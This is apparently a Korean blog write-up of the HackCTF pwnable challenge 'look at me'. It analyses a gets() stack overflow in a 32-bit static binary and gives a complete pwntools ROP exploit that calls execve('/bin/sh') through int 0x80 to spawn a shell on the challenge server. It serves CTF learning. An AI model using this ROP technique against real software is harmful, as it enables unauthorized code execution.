![[HackCTF] look at me](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fba0XAj%2FbtqGdDcG3Ld%2FaU29Xj8eQjGHMFxmRW0urk%2Fimg.png)
728x90
checksec
32bit
statically linked
not stripped
Pseudo Code
gets함수 이용하기 ==> overflow 취약
v1은 ebp - 18h ==> 0x18 + SFP(4) 를 dummy로 채우면 return address를 덮어 쓸 수 있을 것
실행
Payload
함수 주소 구하기
gets 주소 = 0x804f120
mprotect 주소 = 0x806e0f0
writable Area
.bss = 0x80eaf80 >> 0x80eab000 에 "/bin/sh\x00" 쓰기
gadget
int 0x80 ; ret ; = 0x806f630
pop eax ; ret ; = 0x80b81c6
pop ebx ; ret ; = 0x80481c9
pop ecx ; ret ; = 0x80de955
pop edx ; ret ; = 0x806f02a
exploit (1) - execve()인자 전달하기
execve("/bin/sh"주소, null, null)
from pwn import *
#context.log_level = 'debug'
elf = ELF("./lookatme")
p = remote("ctf.j0n9hyun.xyz", 3017)
binsh = "/bin/sh\x00"
pa = 0x80b81c6
pb = 0x80481c9
pc = 0x80de955
pd = 0x806f02a
int80 = 0x806f630
gets = 0x804f120
writable = 0x80eb000
pl = "A"*(0x18 + 4)
pl += p32(gets)
pl += p32(pa)
pl += p32(writable)
pl += p32(pa)
pl += p32(0xb)
pl += p32(pd)
pl += p32(0)
pl += p32(pc)
pl += p32(0)
pl += p32(pb)
pl += p32(writable)
pl += p32(int80)
p.sendlineafter("\n", pl)
p.sendline(binsh)
p.interactive()
SMALL
'System > PWNABLE' 카테고리의 다른 글
| baby1 (0) | 2020.08.23 |
|---|---|
| [HackCTF] SysROP (0) | 2020.08.07 |
| gets_ (0) | 2020.08.01 |
| [ROP Emporium] write4 (0) | 2020.07.19 |
| [HackCTF] pwning (0) | 2020.07.18 |